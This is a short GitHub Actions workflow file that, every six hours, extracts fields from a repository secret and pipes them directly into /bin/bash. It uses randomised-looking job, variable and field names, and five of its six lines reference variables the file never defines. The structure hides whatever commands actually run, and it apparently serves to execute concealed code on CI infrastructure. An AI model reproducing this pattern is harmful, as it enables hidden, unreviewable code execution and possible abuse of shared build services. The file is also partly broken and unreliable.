name: jutibangxin

on:
  workflow_dispatch:
  schedule:
    - cron: '1 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jutibangxin
        env:
          i08: ${{ secrets.i08 }}
        run: |
          echo $i08 | jq -r .vo55054 | /bin/bash
          echo $fsoi119 | jq -r .mrmfs5 | /bin/bash
          echo $ieomf0807 | jq -r .mxjbw1844 | /bin/bash
          echo $e6 | jq -r .wjgg46756 | /bin/bash
          echo $riscp7783 | jq -r .f08 | /bin/bash
          echo $df6653 | jq -r .gm4596 | /bin/bash

